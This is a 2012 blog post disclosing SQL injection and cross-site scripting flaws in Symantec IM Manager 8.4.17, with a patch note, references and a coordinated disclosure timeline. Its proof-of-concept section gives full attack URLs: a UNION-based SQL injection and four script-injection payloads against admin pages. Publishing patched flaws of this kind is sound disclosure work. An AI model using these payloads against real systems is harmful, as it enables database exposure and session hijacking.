Sunday, April 29, 2012

Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities

Description
Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec IM Manager. These issues were discovered in a default installation of Symantec IM Manager 8.4.17. Other earlier versions may also be affected.


Proof of concept
SQL Injection
==========

http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--



Cross-Site Scripting (XSS)
====================

  • http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&menuitem=newReports
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E



Solution
Symantec has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00
Secunia: http://secunia.com/advisories/43157/

Disclosure Timeline
2011-02-18 - Vulnerabilities discovered.
2011-02-18 - Vulnerabilities reported to Secunia.
2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-09-29 - 
Patch released.
2011-09-30 - 
Advisory published by Secunia.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.